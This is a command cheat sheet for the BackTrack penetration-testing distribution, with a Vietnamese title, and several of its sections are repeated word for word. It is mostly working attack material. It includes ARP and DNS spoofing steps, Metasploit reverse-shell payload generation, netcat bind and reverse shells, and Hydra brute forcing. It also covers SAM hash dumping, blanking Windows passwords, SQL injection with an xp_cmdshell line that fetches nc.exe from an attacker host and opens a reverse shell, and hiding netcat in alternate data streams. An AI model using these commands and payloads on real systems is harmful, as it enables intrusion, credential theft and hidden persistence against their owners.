Các lệnh cơ bản dùng trong BackTrack

Networking

dhcpcd

Renew dynamic IP address:

dhcpcd -k

ifconfig eth0 up

dhcpcd

Static IP address:

ifconfig eth0 192.168.0.100/24

route add default gw 192.168.0.1

echo nameserver 192.168.0.1 > /etc/resolv.conf

Services

Apache server:

apachectl start

apachectl stop

SSH server:

sshd-generate

/usr/sbin/sshd

pkill sshd

ssh user@targetIP
TFTP server:

atftpd --daemon --port 69 /tmp/

pkill tftpd

VNC server:

vncserver

pkill Xvnc

Basics

Mount a local hard drive:

mount /dev/hda1 /mnt/hda1

ls -l /mnt/hda1

Mount a Windows network share:

share <user> <targetIP> <remote share>

share admin 10.1.1.2 c$

Enter a password for the remote share.

ls -l /mnt/share/
umount /mnt/share

Edit a file:

nano test.sh

<ctrl> x
y

<enter>

chmod 755 test.sh

./test.sh

Compile a program:

gcc -o newname exploit.c

gcc -o dcom 66.c

./dcom

Install a new program:

tar zxvf program.tar.gz

cd to the new program folder

./configure

make

su root

make install

Footprinting

Whois:

whois target.com

ping www.target.com

whois targetIP
DNS:

dig target.com any

PTR

NS

SOA

SRV

MX

host -l target.com <name server>

1.

Bullet CentralOps
2.

Bullet DNSstuff
3.

Bullet ServerSniff
4.

Bullet Netcraft

Exploits

cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.

cat exploit | grep "#include"

Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u

Scanning

scanrand -b10M targetIP:quick

nmap:

-sS

-sT

-sU

-PS

-PA

-PN

-n

-A

-O

-sV
-p

-T

-iL

-oG

nmap -sS -PN -n targetIP

nmap -sU -PN -n targetIP

nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt

nmap -sS -p 135,139,445 targetIP

nmap -sS -p T:1433,U:1434 targetIP

amap:

Take the results from nmap and check for services on uncommon ports.

amap -i scan.txt

1.

OS Fingerprinting

p0f -i eth0 -U -p

point a browser to the targetIP

xprobe2 targetIP

1.

Bullet Banner Grabbing

nc targetIP port
nc 10.1.1.2 80

telnet targetIP port

HEAD /HTTP/1.0

<enter 2x>

wget targetIP

cat index.html | more

Exploits

cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep "#include"

Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
1.

Windows Enumeration

nmap -sS -p 139,445 targetIP

nbtscan -f targetIP
smbgetserverinfo -i targetIP

smbdumpusers -i targetIP
smbclient -L //targetIP

Bullet Using Windows

net use \\targetIP\ipc$ "" /u:""

net view \\targetIP

smbclient:

smbclient -L hostName -I targetIP

smbclient -L hostName/share -U ""

smbclient -L hostName -I targetIP -U admin

rpcclient:

rpcclient targetIP -U “”

netshareenum

enumdomusers

lsaenumsid

queryuser RID

createdomuser
ARP Spoofing

ettercap:

nano /usr/local/etc/etter.conf

Under the Linux section, uncomment both lines under iptables.

Sniff > Unified sniffing > Network interface: eth0 > OK

Hosts > Scan for hosts (do this two times)

Hosts > Hosts list

Select the default gateway > Add to Target 1

Select the target > Add to Target 2

Mitm > Arp poisoning > Sniff remote connections > OK

Start > Start sniffing

dsniff -i eth0

urlsnarf -i eth0

msgsnarf -i eth0

driftnet -i eth0

dns spoofing:

nano /usr/local/share/ettercap/etter.dns

Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof

Mitm > Arp poisoning > Sniff remote connections > OK

Start > Start sniffing

cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep "#include"

Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
1.

Metasploit

svn update

Web Interface:

./msfweb

Console:

./msfconsole

help

show <option>
search <name>

use <exploit name>

show options

set <OPTION NAME> <option>

show payloads

set PAYLOAD <payload name>

set <OPTION NAME> <option>

show targets

set TARGET <target number>

exploit

Interactive sessions:

sessions -l

sessions -i <ID>

sessions -k <ID>

<ctrl> z

<ctrl> c

jobs

jobs -K

Auxiliary scanners:

show auxiliary

use <auxiliary name>

set <OPTION NAME> <option>

scanner/discovery/sweep_udp

scanner/smb/version

scanner/mssql/mssql_ping

scanner/mssql/mssql_login

Payloads:

Attacker behind firewall: bind shell

Target behind firewall: reverse shell

Bullet Meterpreter

Automated:

db_import_nessus_nbe

db_import_nmap_xml

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

db_destroy pentest

db_create pentest

db_nmap targetIP

db_hosts
db_services

db_autopwn

db_autopwn -t -p -e

Command Line Interface:

./msfcli <exploit or auxiliary> S

./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

Payload generator:

./msfpayload <payload> <variable=value> <output type>

S summary and options of payload

C C language

P Perl

y Ruby

R Raw, allows payload to be piped into msfencode and other tools

J JavaScript

X Windows executable

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X >

Encode shellcode:

./msfencode <options> <variable=value>

Pipe the output of msfpayload into msfencode, show bad characters and list available
encoders.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder and format the output to C.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor

1.

Metasploit

svn update

Web Interface:

./msfweb

Console:

./msfconsole

help

show <option>

search <name>

use <exploit name>

show options

set <OPTION NAME> <option>

show payloads

set PAYLOAD <payload name>

show targets

set TARGET <target number>

exploit

Interactive sessions:

sessions -l

sessions -i <ID>

sessions -k <ID>

<ctrl> z

<ctrl> c

jobs

jobs -K

Auxiliary scanners:

show auxiliary

use <auxiliary name>

set <OPTION NAME> <option>

run

scanner/discovery/sweep_udp

scanner/smb/version

scanner/mssql/mssql_ping

scanner/mssql/mssql_login

Payloads:
Attacker behind firewall: bind shell

Target behind firewall: reverse shell

1.

Bullet Meterpreter

Automated:

db_import_nessus_nbe

db_import_nmap_xml

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

db_destroy pentest

db_create pentest

db_nmap targetIP

db_hosts

db_services

db_autopwn

db_autopwn -t -p -e

Command Line Interface:

./msfcli <exploit or auxiliary> S

./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

./msfpayload <payload> <variable=value> <output type>

S summary and options of payload

C C language

P Perl

y Ruby

R Raw, allows payload to be piped into msfencode and other tools

J JavaScript

X Windows executable

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X >

Encode shellcode:

./msfencode <options> <variable=value>

Pipe the output of msfpayload into msfencode, show bad characters and list available
encoders.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder and format the output to C.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor

1.

TFTP
attack box 10.1.1.2

cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box

tftp -i 10.1.1.2 GET nc.exe

TFTP copies files with read only attributes. So to delete the file:

attrib -r nc.exe

del nc.exe

1.

Netcat

attacker: 10.1.1.1

target: 10.1.1.2

Port scanner:
nc -v -z 10.1.1.2 1-1024

Chat session:

target: nc -lvp 4444

attacker: nc -v 10.1.1.2 4444

Transfer file to target:

target: nc -lvp 4444 > output.txt

attacker: nc -v 10.1.1.2 4444 < test.txt

Bind shell:
target: nc -lvp 4444 -e cmd.exe

attacker: nc -v 10.1.1.2 4444

Reverse shell:

target: nc -lvp 4444

attacker: nc -v 10.1.1.2 4444 -e /bin/bash

The target should be sitting at an invisible command prompt of the attacker.

You will not see a prompt. Issue any linux command to verify.
scan ports 1 to 1024

Start Netcat and listen verbosely on port 4444

Passwords

Word list:

zcat /pentest/password/dictionaries/wordlist.txt.Z > words

cat words | wc -l

About 306,000 passwords.

Brute force:

ftp with a user name ftp

hydra -l ftp -P words -v targetIP ftp

pop3 with a user name muts

hydra -l muts -P words -v targetIP pop3

snmp
hydra -P words -v targetIP snmp

Microsoft VPN

nmap -p 1723 targetIP

dos2unix words

cat words | thc-pptp-bruter targetIP

WYD:

Use wget to download specific files.

wget -r www.target.com --accept=pdf

wyd.pl -o output.txt www.target.com/

cat output.txt | more

SAM file:

%SYSTEMROOT%/system32/config

%SYSTEMROOT%/repair

Dumping hashes:

./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP

meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\

meterpreter > execute -f cmd -c

meterpreter > interact x

C:\WINDOWS\system32> pwdump \\127.0.0.1

John the Ripper:

nano hash.txt

Delete unneeded accounts.

cp hash.txt /pentest/password/john-1.7.2/run/

cd /pentest/password/john-1.7.2/run/

./john hash.txt

Physical Access

Mount a NTFS share in read/write mode:

Boot your box with Backtrack.

mount

umount /mnt/hda1

modprobe fuse

ntfsmount /dev/hda1 /mnt/hda1

mount

ls -l /mnt/hda1

Dump the SAM file:

bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt

samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt

cat hash.txt

Modify SAM file directly:

chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *

Do you really wish to change it? y

Write hive files? y

unmount /mnt/sda1

reboot

SQL Injection

nmap -sS -p 1521 targetIP

nmap -sS -p T:1433,U:1434 targetIP

Release

SQL Server 2000 RTM

SQL Server 2000 SP1

SQL Server 2000 SP2

SQL Server 2000 SP3

SQL Server 2000 SP3a

SQL Server 2000 SP4

SQL Server 2005 RTM

SQL Server 2005 SP1

SQL Server 2005 SP2

Authentication bypass:

' or 1=1--
Enumerating table names:

' having 1=1--

' group by table having 1=1--

' group by table, table2 having 1=1--

' group by table, table2, table3 having 1=1--

Enumerating column types:

union select sum(column) from table --

union select sum(column2) from table --

Adding data:

' ; insert into table values('value','value2','value3')--

MS SQL stored procedure:

Output the database info into an html file, that you can view with a browser.

' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --

www.target.com/test.html

Run ipconfig on target and write to a file, that you can view with a browser.

' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--

www.target.com/test.txt

Upload netcat and spawn a reverse shell.

' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53
-e cmd.exe' ; --
attacker: nc -lvp 53

Alternate Data Streams

Hide netcat inside a text file. Note netcat must be located in the current directory.

echo "This is a test" > test.txt

type nc.exe > test.txt:nc.exe

del nc.exe

start ./test.txt:nc.exe